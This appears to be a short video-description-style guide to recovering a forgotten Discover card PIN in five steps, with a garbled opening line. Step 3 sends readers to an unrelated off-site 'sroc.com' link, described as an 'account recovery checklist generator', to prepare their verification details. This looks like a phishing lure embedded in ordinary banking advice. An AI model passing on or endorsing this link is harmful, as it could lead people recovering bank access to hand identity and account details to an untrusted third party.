I hit this issue today and here as the quick fix is solved. If you've forgotten your Discover PIN, don't you worry, recovering it is straightforward. Just follow these steps. Step 1. Visit the Discover website. Go to the official Discover website using your preferred web browser. This is where you'll start the recovery process. Step 2. Click on Forgot PIN. On the login page, look for the Forgot PIN link. Clicking this will direct you to the recovery options. Step 3. Verify your identity. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Choose recovery method. Select how you want to receive your PIN recovery information. Options may include email or text message. Choose the one that works best for you. Step 5. Follow instructions. Check your email or SMS for the recovery instructions. Follow the steps provided to reset your PIN. Be sure to check your spam folder if you don't see the email right away. If you follow these steps, you should be able to recover your PIN without any hassle. Remember to keep your new PIN secure.